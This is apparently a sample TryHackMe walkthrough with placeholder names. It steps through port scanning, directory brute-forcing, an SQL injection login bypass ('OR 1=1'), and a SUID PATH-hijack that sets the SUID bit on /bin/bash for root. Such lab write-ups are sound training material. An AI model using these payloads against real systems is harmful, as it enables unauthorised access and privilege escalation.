Sample TryHackMe Room

March 20, 2024 Difficulty: Easy

Sample TryHackMe Room Walkthrough

Room Information

  • Room Name: Sample Room
  • Difficulty: Easy
  • Tags: Web Security, Enumeration, Privilege Escalation

Task 1: Initial Access

First, we need to scan the target machine:

1

nmap -sV -sC -p- 10.10.10.10

Findings

  • Port 80: HTTP
  • Port 22: SSH
  • Port 21: FTP

Task 2: Web Enumeration

Let’s check the web server:

1

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt

Discovered Directories

  • /admin
  • /backup
  • /uploads

Task 3: Exploitation

Found a vulnerable parameter in the login form:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

import requests

url = "http://10.10.10.10/login"
data = {
    "username": "admin",
    "password": "' OR '1'='1"
}

response = requests.post(url, data=data)
print(response.text)

Task 4: Privilege Escalation

After gaining initial access, we found a SUID binary:

1

find / -perm -4000 2>/dev/null

Exploiting the SUID Binary

1
2
3
4

echo 'chmod +s /bin/bash' > /tmp/exploit
chmod +x /tmp/exploit
export PATH=/tmp:$PATH
./vulnerable_binary

Task 5: Capture the Flag

Found the flag in the root directory:

1

cat /root/flag.txt

Lessons Learned

  • Always check for common web vulnerabilities
  • Don’t forget to enumerate all services
  • Look for SUID binaries for privilege escalation

Tags:

Categories: